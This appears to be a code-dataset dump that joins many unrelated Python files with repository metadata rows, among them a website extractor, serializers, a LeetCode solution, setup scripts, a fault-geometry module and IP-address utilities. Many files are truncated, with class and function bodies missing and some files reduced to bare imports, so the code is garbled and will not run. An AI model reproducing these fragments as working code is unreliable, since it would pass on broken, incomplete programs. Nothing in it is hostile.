] | null | null | null | src/google.com/get_website.py | IRE-Project/Data-Collector | 9ca3efc32afe068682d334c8f833cb97ff2af36d | [
"MIT"
] | null | null | null | """@file
This file is responsible for extracting website from google search results and formatting them for later use.
"""
import json
from urllib.parse import urlparse
import nltk
import os
tc = 0
cp = 0
def find_website(raw_data):
"""
Uses several rule based techniques to find candidate websites for a company
:param raw_data:
:return: list of candidate websites
"""
if raw_data["context"] != []:
print(raw_data["context"])
website = set()
removed_tokens = ["ltd", "ltd.", "co", "co.", "limited", "services", "private", "govt", "government", "industries"
,"incorporation", "public", "pvt", "and", "&"]
c_name = [tok for tok in raw_data["query"].lower().strip().split() if tok not in removed_tokens]
for ele in raw_data["top_urls"]:
try:
domain = urlparse(ele["url"]).netloc
if "official" in ele["description"] and "website" in ele["description"]:
website.add(domain)
else:
abbreviation = "".join([tok[0] for tok in c_name])
webname = domain.split(".")
if len(webname) < 2:
continue
elif len(webname) == 2:
webname = webname[0]
else:
if webname[1] == "co":
webname = webname[0]
else:
webname = webname[1]
if nltk.edit_distance(webname, abbreviation) <= 2:
website.add(domain)
elif any((tok in domain) and (len(tok) > 4) for tok in c_name):
website.add(domain)
except Exception as e:
print(str(e), ele)
if len(website) > 0:
global tc, cp
cp += 1
tc += len(website)
# if len(website) > 1:
# print(c_name, website)
return list(website)
def get_websites(raw):
"""
get all candidate websites for all search results in raw
:param raw: google search results
:return: dict with company name and candidate websites
"""
count = 0
data = {}
for key,val in raw.items():
data[key] = {
"Company": val["query"],
"website": find_website(val)
}
count += 1
print(f"\rProgress: {count}", end="")
return data
def reformat(data, links):
"""
Reformat data to better suit the global data paradigm
:param data: unformatted data
:param links: the exhaustive linkslist used
:return: the formatted data
"""
rev_map = {}
for ele in links["data"]:
rev_map[ele[1].lower().strip()] = ele[0]
new_data = {}
for key, val in data.items():
cin = rev_map[val["Company"].lower().strip()]
new_data[cin] = val["website"]
print(len(new_data))
return new_data
def get_all_websites(dir_path):
"""
Get all websites for all files in a directory
:param dir_path: path to directory
:return: dict of unformatted comany names and candidate websites
"""
data = {}
for file_name in os.listdir(dir_path):
if file_name.endswith(".json") and file_name != "final_data.json":
file = open(dir_path + file_name)
raw = json.load(file)
file.close()
websites = get_websites(raw)
for key, val in websites.items():
data[key] = val
return data
if __name__ == "__main__":
data = get_all_websites("../../data/google.com/")
print("\n", cp, tc)
file = open("../../data/zaubacorp.com/linkslist.json")
links = json.load(file)
file.close()
data = reformat(data, links)
file = open("../../data/google.com/final_data.json", "w+")
json.dump(data, file, indent=4)
file.close()
| 27.695652 | 118 | 0.554422 |
b1bd684c676eed6c1630b156d59e20baabdf47e4 | 212 | py | Python | easy/43_set_union_op.py | UltiRequiem/hacker-rank-python | bcc6a467dd2a1f90cf61c1d6b049f566f5ffabe1 | [
"MIT"
] | 4 | 2021-08-02T21:34:38.000Z | 2021-09-24T03:26:33.000Z | easy/43_set_union_op.py | UltiRequiem/hacker-rank-python | bcc6a467dd2a1f90cf61c1d6b049f566f5ffabe1 | [
"MIT"
] | null | null | null | easy/43_set_union_op.py | UltiRequiem/hacker-rank-python | bcc6a467dd2a1f90cf61c1d6b049f566f5ffabe1 | [
"MIT"
] | 3 | 2021-08-02T21:34:39.000Z | 2021-08-02T21:37:16.000Z | from functools import reduce as rd
if __name__ == "__main__":
print(main())
| 17.666667 | 86 | 0.561321 |
b1c12120eb1970800352a4b0dd3d40166babaf18 | 2,354 | py | Python | api/serializers.py | openjobs-cinfo/openjobs-api | b902d41fc20167727bd058a77906ddb9a83fd52f | [
"MIT"
] | null | null | null | api/serializers.py | openjobs-cinfo/openjobs-api | b902d41fc20167727bd058a77906ddb9a83fd52f | [
"MIT"
] | null | null | null | api/serializers.py | openjobs-cinfo/openjobs-api | b902d41fc20167727bd058a77906ddb9a83fd52f | [
"MIT"
] | null | null | null | from rest_framework.serializers import ModelSerializer
from .models import Degree, Job, Skill, DataOrigin, Address, Qualification, User
| 28.707317 | 115 | 0.643161 |
b1c1b0752a916c3d0a0607d4658e6692c2c8187f | 506 | py | Python | naive_program.py | silentShadow/Python-3.5 | acbbbc88826d9168ef2af29ca465930256f67332 | [
"MIT"
] | null | null | null | naive_program.py | silentShadow/Python-3.5 | acbbbc88826d9168ef2af29ca465930256f67332 | [
"MIT"
] | null | null | null | naive_program.py | silentShadow/Python-3.5 | acbbbc88826d9168ef2af29ca465930256f67332 | [
"MIT"
] | null | null | null | import urllib.request
urls = [ "https://www.google.com","httpr://www.python.org" ]
for link in urls:
request = urllib.request.Request( link)
response = urllib.request.urlopen( request)
'''
action here
'''
'''\
NORMAL: sloooow
[][][] [][] [][]{}{} {}{}{} {}{}{} {}
THREADING: still sloow
google: [] [] [] [][] [][][][] []
python: {}{}{} {} {}{} {} {}{}
ASYNCIO: Event Loop: fastest
[] {} [] {} [] {} {}{}{} [][][] {}{} [][]
''' | 23 | 60 | 0.420949 |
b1c3d6bce2bd16b269bea21fd537024f6377ca87 | 779 | py | Python | utils/management/commands/report_utils/msg_counts.py | tperrier/mwachx | 94616659dc29843e661b2ecc9a2e7f1d4e81b5a4 | [
"Apache-2.0"
] | 3 | 2015-05-27T14:35:49.000Z | 2016-02-26T21:04:32.000Z | utils/management/commands/report_utils/msg_counts.py | tperrier/mwachx | 94616659dc29843e661b2ecc9a2e7f1d4e81b5a4 | [
"Apache-2.0"
] | 375 | 2015-01-31T10:08:34.000Z | 2021-06-10T19:44:21.000Z | utils/management/commands/report_utils/msg_counts.py | tperrier/mwachx | 94616659dc29843e661b2ecc9a2e7f1d4e81b5a4 | [
"Apache-2.0"
] | 6 | 2016-01-10T19:52:41.000Z | 2020-06-15T22:07:24.000Z | import collections
from django.db import models
import contacts.models as cont
| 29.961538 | 93 | 0.653402 |
b1c3f31c631276e9ba4df0e85896052a590bb06f | 942 | py | Python | leetcode/medium/137-Single_number_II.py | shubhamoli/practice | 5a24fdeb6e5f43b821ef0510fe3b343ddda18f22 | [
"MIT"
] | 1 | 2020-02-25T10:32:27.000Z | 2020-02-25T10:32:27.000Z | leetcode/medium/137-Single_number_II.py | shubhamoli/practice | 5a24fdeb6e5f43b821ef0510fe3b343ddda18f22 | [
"MIT"
] | null | null | null | leetcode/medium/137-Single_number_II.py | shubhamoli/practice | 5a24fdeb6e5f43b821ef0510fe3b343ddda18f22 | [
"MIT"
] | null | null | null | """
Leetcode #137
"""
from typing import List
from collections import Counter
if __name__ == "__main__":
solution = Solution()
assert solution.singleNumber([2,2,3,2]) == 3
assert solution.singleNumber([0,1,0,1,0,1,99]) == 99
assert solution.singleNumber_NO_SPACE([2,2,3,2]) == 3
assert solution.singleNumber_NO_SPACE([0,1,0,1,0,1,99]) == 99
| 19.625 | 65 | 0.541401 |
b1c431a1f0a698ee3cb88df0ac882e928a41cf16 | 1,133 | py | Python | CS303/lab4-6/work/algorithm_ncs/ncs_client.py | Wycers/Codelib | 86d83787aa577b8f2d66b5410e73102411c45e46 | [
"MIT"
] | 22 | 2018-08-07T06:55:10.000Z | 2021-06-12T02:12:19.000Z | CS303_Artifical-Intelligence/NCS/algorithm_ncs/ncs_client.py | Eveneko/SUSTech-Courses | 0420873110e91e8d13e6e85a974f1856e01d28d6 | [
"MIT"
] | 28 | 2020-03-04T23:47:22.000Z | 2022-02-26T18:50:00.000Z | CS303/lab4-6/work/algorithm_ncs/ncs_client.py | Wycers/Codelib | 86d83787aa577b8f2d66b5410e73102411c45e46 | [
"MIT"
] | 4 | 2019-11-09T15:41:26.000Z | 2021-10-10T08:56:57.000Z | import json
from algorithm_ncs import ncs_c as ncs
import argparse
parser = argparse.ArgumentParser(description="This is a NCS solver")
parser.add_argument("-c", "--config", default="algorithm_ncs/parameter.json", type=str, help="a json file that contains parameter")
parser.add_argument("-d", "--data", default="6", type=int, help="the problem dataset that need to be solved")
args = parser.parse_args()
"""
how to use it?
example:
python3 -m algorithm_ncs.ncs_client -d 12 -c algorithm_ncs/parameter.json
good luck!
"""
if __name__ == '__main__':
config_file = args.config
p = args.data
with open(config_file) as file:
try:
ncs_para = json.loads(file.read())
except:
raise Exception("not a json format file")
_lambda = ncs_para["lambda"]
r = ncs_para["r"]
epoch = ncs_para["epoch"]
n= ncs_para["n"]
ncs_para = ncs.NCS_CParameter(tmax=300000, lambda_exp=_lambda, r=r, epoch=epoch, N=n)
print("************ start problem %d **********" % p)
ncs_c = ncs.NCS_C(ncs_para, p)
ncs_res = ncs_c.loop(quiet=False, seeds=0)
print(ncs_res)
| 29.815789 | 131 | 0.655781 |
b1c525fad1b20ec7dd22a4699a9e0a34d0093f34 | 1,999 | py | Python | src/setup.py | umedoblock/fugou | 45d95f20bba6f85764fb686081098d92fc8cdb20 | [
"BSD-3-Clause"
] | null | null | null | src/setup.py | umedoblock/fugou | 45d95f20bba6f85764fb686081098d92fc8cdb20 | [
"BSD-3-Clause"
] | 2 | 2018-11-25T12:06:08.000Z | 2018-12-05T14:37:59.000Z | src/setup.py | umedoblock/fugou | 45d95f20bba6f85764fb686081098d92fc8cdb20 | [
"BSD-3-Clause"
] | null | null | null | # name
# name of the package short string (1)
# version
# version of this release short string (1)(2)
# author
# package authors name short string (3)
# author_email
# email address of the package author email address (3)
# maintainer
# package maintainers name short string (3)
# maintainer_email
# email address of the package maintainer email address (3)
# url
# home page for the package URL (1)
# description
# short, summary description of the package short string
# long_description
# longer description of the package long string (5)
# download_url
# location where the package may be downloaded URL (4)
# classifiers
# a list of classifiers list of strings (4)
# platforms
# a list of platforms list of strings
# license
# license for the package short string (6)
from distutils.core import setup, Extension
import sys
# print('sys.argv =', sys.argv)
# print('type(sys.argv) =', type(sys.argv))
if '--pg' in sys.argv:
suffix = '_pg'
sys.argv.remove('--pg')
else:
suffix = ''
# print('suffix =', suffix)
ext_name = '_par2' + suffix
module_par2 = \
Extension(ext_name, sources=[
'par2/par2/pypar2.c',
'par2/par2/libpar2.c'
],
)
ext_name = '_gcdext' + suffix
module_gcdext = \
Extension(ext_name, sources = ['ecc/ecc/_gcdext.c'],
)
ext_name = '_montgomery' + suffix
module_montgomery = \
Extension(ext_name, sources = ['montgomery/pymontgomery.c'])
ext_name = '_camellia' + suffix
module_camellia = \
Extension(ext_name, sources = ['camellia/pycamellia.c',
'camellia/camellia.c',
'libfugou.c'])
setup( name = 'fugou',
version = '8.0',
author = '(umedoblock)',
author_email = 'umedoblock@gmail.com',
url = 'empty',
description = 'This is a gcdext() package',
ext_modules = [
module_montgomery, module_gcdext, module_camellia
])
| 27.763889 | 64 | 0.630815 |
b1c59e2da37dca10b24d9fc1fc1c500ca912a5d8 | 339 | py | Python | setup.py | elcolumbio/cctable | 798c46a833cb861d9e80cc52ab81cfc859c19d5e | [
"Apache-2.0"
] | null | null | null | setup.py | elcolumbio/cctable | 798c46a833cb861d9e80cc52ab81cfc859c19d5e | [
"Apache-2.0"
] | null | null | null | setup.py | elcolumbio/cctable | 798c46a833cb861d9e80cc52ab81cfc859c19d5e | [
"Apache-2.0"
] | null | null | null | from setuptools import setup
setup(name='cctable',
version='0.3',
description='Frontend visualizing accouting data.',
url='github.com/elcolumbio/cctable',
author='Florian Benk',
author_email='f.benkoe@innotrade24.de',
license='Apache License, Version 2.0 (the "License")',
packages=['cctable'])
| 30.818182 | 60 | 0.666667 |
b1c8b03e6d7fe1d0aa211ed21f9c71de064b475d | 2,685 | py | Python | scoff/misc/textx.py | brunosmmm/scoff | e1a0b5f98dd9e60f41f3f7cfcda9038ffd80e138 | [
"MIT"
] | null | null | null | scoff/misc/textx.py | brunosmmm/scoff | e1a0b5f98dd9e60f41f3f7cfcda9038ffd80e138 | [
"MIT"
] | 1 | 2020-03-20T13:57:52.000Z | 2021-03-11T17:25:25.000Z | scoff/misc/textx.py | brunosmmm/scoff | e1a0b5f98dd9e60f41f3f7cfcda9038ffd80e138 | [
"MIT"
] | null | null | null | """Auto-generate custom TextX AST classes."""
import re
try:
import black
except ImportError:
black = None
GRAMMAR_RULE_REGEX = re.compile(
r"([a-zA-Z_]\w*)\s*:(((['\"];['\"])|[^;])+);", re.S
)
RULE_MEMBER_REGEX = re.compile(
r"([a-zA-Z_]\w*)\s*([?\+\*]?)=\s*([^\s]+)", re.S
)
if black is not None:
BLACK_FILE_MODE = black.FileMode(line_length=79)
def parse_textx_rule(rule_definition):
"""Parse a rule definition."""
members = re.findall(RULE_MEMBER_REGEX, rule_definition)
# shortcut to optional members
revised_members = []
for member in members:
name, operator, value = member
if value.endswith("?"):
operator = "?"
revised_members.append((name, operator, value))
return [(member[0], member[1]) for member in revised_members]
def parse_textx_grammar(grammar_file):
"""Parse grammar file."""
with open(grammar_file, "r") as f:
contents = f.read()
rules = re.findall(GRAMMAR_RULE_REGEX, contents)
grammar_rules = {}
for rule in rules:
rule_name = rule[0]
rule_body = rule[1]
rule_members = parse_textx_rule(rule_body.strip())
if len(rule_members) < 1:
continue
grammar_rules[rule_name.strip()] = rule_members
return grammar_rules
def build_python_class_text(class_name, subclass_of, *members):
"""Build python class declaration."""
member_arguments = []
optional_arguments = []
for member in members:
member_name, member_operator = member
if member_operator in ("?", "*"):
# optional
optional_arguments.append("{name}=None".format(name=member_name))
else:
member_arguments.append(member_name)
member_arguments.extend(optional_arguments)
class_contents = """
class {name}({parent_class}):
\"\"\"{name} AST.\"\"\"
__slots__ = ({slots})
def __init__(self, parent, {members}, **kwargs):
\"\"\"Initialize.\"\"\"
super().__init__(parent=parent, {member_assign}, **kwargs)
""".format(
name=class_name,
parent_class=subclass_of,
members=", ".join(member_arguments),
slots=", ".join(
[
'"{}"'.format(member[0])
for member in members
if member != "parent"
]
),
member_assign=", ".join(
["{name}={name}".format(name=member[0]) for member in members]
),
)
if black is not None:
return (
class_name,
black.format_str(class_contents, mode=BLACK_FILE_MODE),
)
else:
return (class_name, class_contents)
| 27.680412 | 77 | 0.587337 |
b1c9b912939d5da977a0f0ba07c635174c5f0f28 | 683 | py | Python | scripts/runTests.py | RDFLib/pymicrodata | a4e2d82d092316f0742902227664bf691be6c17f | [
"W3C-20150513"
] | 25 | 2015-01-30T13:35:32.000Z | 2021-12-29T18:42:35.000Z | scripts/runTests.py | RDFLib/pymicrodata | a4e2d82d092316f0742902227664bf691be6c17f | [
"W3C-20150513"
] | 7 | 2016-01-23T18:01:01.000Z | 2020-12-22T16:27:38.000Z | scripts/runTests.py | RDFLib/pymicrodata | a4e2d82d092316f0742902227664bf691be6c17f | [
"W3C-20150513"
] | 4 | 2016-04-30T23:37:56.000Z | 2019-03-24T20:56:32.000Z | #!/usr/bin/env python
"""
Run the microdata testing locally
"""
# You may want to adapt this to your environment...
import sys
sys.path.append("..")
import glob
from pyMicrodata import pyMicrodata
from rdflib import Graph
###########################################
# marshall all test HTML files
test_path = "../tests/"
test_html_files = glob.glob(test_path + "*.html")
# create the testing object
processor = pyMicrodata()
# for each HTML file...
for f in test_html_files:
print("trying {}".format(f))
g1 = Graph().parse(data=processor.rdf_from_source(f), format="turtle")
g2 = Graph().parse(f.replace("html", "ttl"), format="turtle")
assert g1.isomorphic(g2)
| 24.392857 | 74 | 0.657394 |
b1ca7d47ebdd386eeb55838e16468d553751ab0a | 2,910 | py | Python | DeleteBackupFiles/deletebackupfile.py | Liuzkai/PythonScript | fb21ad80e085f6390ae970b81404f7e5c7923f4e | [
"MIT"
] | 1 | 2021-01-16T16:09:33.000Z | 2021-01-16T16:09:33.000Z | DeleteBackupFiles/deletebackupfile.py | Liuzkai/PythonScript | fb21ad80e085f6390ae970b81404f7e5c7923f4e | [
"MIT"
] | null | null | null | DeleteBackupFiles/deletebackupfile.py | Liuzkai/PythonScript | fb21ad80e085f6390ae970b81404f7e5c7923f4e | [
"MIT"
] | 1 | 2021-01-16T16:09:36.000Z | 2021-01-16T16:09:36.000Z | # -*- coding: utf-8 -*-
# https://oldj.net/
u"""
python syncdir.py source_dir target_dir
source_dir target_dir
source_dir target_dir
source_dir target_dir
source_dir
"""
import os
import sys
import shutil
if __name__ == "__main__":
# if len(sys.argv) != 3:
# if "-h" in sys.argv or "--help" in sys.argv:
# print(__doc__)
# sys.exit(1)
# errExit(u"invalid arguments!")
# source_dir, target_dir = sys.argv[1:]
# if not os.path.isdir(source_dir):
# errExit(u"'%s' is not a folder!" % source_dir)
# elif not os.path.isdir(target_dir):
# errExit(u"'%s' is not a folder!" % target_dir)
source_dir = "D:\\UGit\\HoudiniDigitalAssetSet"
target_dir = "D:\\NExTWorkSpace\\ArkWorkSpace\\Projects\\Ark2019\\Trunk\\UE4NEXT_Stable\\Engine\\Binaries\\ThirdParty\\Houdini\\HoudiniDigitalAssetSet"
main(source_dir, target_dir)
| 30.957447 | 155 | 0.55189 |
b1cc39d59dda967c7dcf371addd5df5990b99e23 | 5,004 | py | Python | enkube/util.py | rfairburn/enkube-1 | 47910bbcc05a40a5b32c97d44aab9ca5c7038ed0 | [
"Apache-2.0"
] | null | null | null | enkube/util.py | rfairburn/enkube-1 | 47910bbcc05a40a5b32c97d44aab9ca5c7038ed0 | [
"Apache-2.0"
] | 2 | 2019-12-03T20:05:03.000Z | 2021-09-30T17:37:45.000Z | enkube/util.py | rfairburn/enkube-1 | 47910bbcc05a40a5b32c97d44aab9ca5c7038ed0 | [
"Apache-2.0"
] | 1 | 2019-12-03T19:23:05.000Z | 2019-12-03T19:23:05.000Z | # Copyright 2018 SpiderOak, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import json
import yaml
import pyaml
import threading
from functools import wraps
from collections import OrderedDict
from pprint import pformat
from pygments import highlight, lexers, formatters
import curio
from curio.meta import (
curio_running, _from_coroutine, _isasyncgenfunction, finalize)
from curio.monitor import Monitor
_locals = threading.local()
| 25.927461 | 93 | 0.632894 |
b1cf5ce6c13872161132303618fee46973f05973 | 7,588 | py | Python | culpable/fault_projections.py | cossatot/at_fault | 63beba4d616e89ebb4c2eaf48230717a4179d4e2 | [
"MIT"
] | 3 | 2019-12-09T05:25:04.000Z | 2021-04-25T14:55:25.000Z | culpable/fault_projections.py | cossatot/culpable | 63beba4d616e89ebb4c2eaf48230717a4179d4e2 | [
"MIT"
] | 9 | 2016-10-11T16:11:42.000Z | 2017-01-04T21:17:27.000Z | culpable/fault_projections.py | cossatot/culpable | 63beba4d616e89ebb4c2eaf48230717a4179d4e2 | [
"MIT"
] | null | null | null | import numpy as np
from numpy import sin, cos, tan, degrees, radians, arctan, arcsin
# Slip projections
## To/From offset
## Others
def beta_from_dip_rake(dip, rake):
'''
Returns beta, the angle (in degrees) between the strike and the
trend of apparent dip.
'''
return degrees( arctan( tan(radians(rake)) * cos(radians(dip))))
# aggregator functions
| 32.289362 | 78 | 0.741566 |
b1d089298e5f4bb67268690bc90d7e531a39929b | 7,710 | py | Python | aleph/model/document.py | gazeti/aleph | f6714c4be038471cfdc6408bfe88dc9e2ed28452 | [
"MIT"
] | 1 | 2017-07-28T12:54:09.000Z | 2017-07-28T12:54:09.000Z | aleph/model/document.py | gazeti/aleph | f6714c4be038471cfdc6408bfe88dc9e2ed28452 | [
"MIT"
] | 7 | 2017-08-16T12:49:23.000Z | 2018-02-16T10:22:11.000Z | aleph/model/document.py | gazeti/aleph | f6714c4be038471cfdc6408bfe88dc9e2ed28452 | [
"MIT"
] | 6 | 2017-07-26T12:29:53.000Z | 2017-08-18T09:35:50.000Z | import logging
from datetime import datetime, timedelta
from normality import ascii_text
from sqlalchemy import func
from sqlalchemy.dialects.postgresql import JSONB
from sqlalchemy.orm.attributes import flag_modified
from aleph.core import db
from aleph.model.metadata import Metadata
from aleph.model.validate import validate
from aleph.model.collection import Collection
from aleph.model.reference import Reference
from aleph.model.common import DatedModel
from aleph.model.document_record import DocumentRecord
from aleph.model.document_tag import DocumentTag
from aleph.text import index_form
log = logging.getLogger(__name__)
| 35.366972 | 113 | 0.623476 |
b1d1d0561cf49238a4a8252a8f7aae4e72eed16d | 1,613 | py | Python | pyInet/__main__.py | LcfherShell/pynet | 80284d7147d7b8d69c631fd6fe1236bb73e50b1b | [
"MIT"
] | null | null | null | pyInet/__main__.py | LcfherShell/pynet | 80284d7147d7b8d69c631fd6fe1236bb73e50b1b | [
"MIT"
] | null | null | null | pyInet/__main__.py | LcfherShell/pynet | 80284d7147d7b8d69c631fd6fe1236bb73e50b1b | [
"MIT"
] | null | null | null | try:
from main import ClassA, ClassB
except:
try:
from pyInet import ClassA, ClassB
except:
from pyInet.main import ClassA, ClassB
if __name__ == "__main__":
child = ClassA #Public Class
network = ClassB #Private Class
print("Call function using public class")
for i in range(3):
for ipv4 in child.IPv4(i):
print("IPv4:", ipv4)
for ipv6 in child.IPv6(i):
print("IPv6:", ipv6)
print("MacAddresss:", child.MacAddresss(),"\n")
i = 0
print("\nCall function using private class")
for i in range(3):
for ipv4 in network.IPv4(i):
print("IPv4:", ipv4)
for ipv6 in network.IPv6(i):
print("IPv6:", ipv6)
print("MacAddresss:", network.MacAddresss(),"\n")
ipv4 = "192.230.212.159"
ipv6 = "f18d:5980:50d1:cf2d:b204:dc2:ad87:6a58"
print("Check Version and Class Ip addresses")
print("IP version:", child.Validate_IP(ipv4))
print("IPv4 Class:", child.IPv4_Class(ipv4))
print("\nIP version:", child.Validate_IP(ipv6))
print("IPv6 Class:", child.IPv6_Class(ipv6))
print("\nManipulate IPv4 :")
for x in range(1, 33):
child.IPv4_Calculator("{}/{}".format(ipv4, x))
print(child.saving.output)
print("\nManipulate IPv6 :")
for y in range(0, 33):
ipv6range = "{}/{}".format(ipv6, y)
child.IPv6_Calculator(ipv6range)
print(child.saving.output)
| 33.604167 | 62 | 0.543707 |
b1d42f3d03c0a3e27b14e56be2c1099412ba4e94 | 3,854 | py | Python | dope/filespec/__init__.py | gwappa/pydope | c8beb315177a850e9d275902a6303e68a319c123 | [
"MIT"
] | null | null | null | dope/filespec/__init__.py | gwappa/pydope | c8beb315177a850e9d275902a6303e68a319c123 | [
"MIT"
] | 5 | 2020-05-13T13:09:45.000Z | 2020-05-14T14:18:43.000Z | dope/filespec/__init__.py | gwappa/pydope | c8beb315177a850e9d275902a6303e68a319c123 | [
"MIT"
] | null | null | null | #
# MIT License
#
# Copyright (c) 2020 Keisuke Sehara
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
import collections as _collections
from ..core import SelectionStatus as _SelectionStatus
def compute_path(self, context):
"""context: Predicate"""
return context.compute_domain_path() / self.format_name(context)
def format_name(self, context, digits=None):
"""context: Predicate"""
runtxt = self.format_run(digits=digits)
chtxt = self.format_channel(context)
sxtxt = self.format_suffix()
return f"{context.subject}_{context.session.name}_{context.domain}{runtxt}{chtxt}{sxtxt}"
| 37.417476 | 102 | 0.639855 |